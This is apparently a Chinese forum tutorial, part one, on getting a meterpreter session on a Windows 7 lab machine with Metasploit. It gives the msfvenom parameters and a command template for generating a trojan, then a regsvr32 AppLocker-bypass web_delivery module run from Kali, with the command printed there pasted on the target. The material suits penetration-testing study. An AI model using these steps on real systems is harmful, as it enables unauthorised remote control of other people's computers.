使用Metasploit渗透攻击windows系统(一)
攻击机:kailiip:192.168.80.157目标机:win7IP:192.168.80.158这里用两种方法去创建meterpreter会话:1)利用kali中的msfvenom生成木马,在目标机上运行,具体步骤如下:常用参数:-p 选择攻击的payload-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
一般格式:msfvenom -p 指定攻击的payload LHOST=监听IP LPORT=监听端口 -f 输出的文件格式 -o 生成木马的文件名
生成木马
设置监听
待目标机运行刚刚生成的木马时,就会产生一个meterpreter会话
2)使用web_delivery模块(你也可以选择其他模块,过程都是相似的)查看该模块可以使用的payload这里我们使用exploit/windows/misc/regsvr32_applocker_bypass_server然后设置IP:set lhost 192.168.80.157 最后运行:run,我们可以看到最下面出现一行命令,根据提示,复制这条命令到目标机上运行即可: 在win7中运行该命令然后在kali中我们就可以看到已经成功监听,并且返回一个session:输入命令:sessions 1 既可以创建meterpreter会话,控制目标机
页:
[1]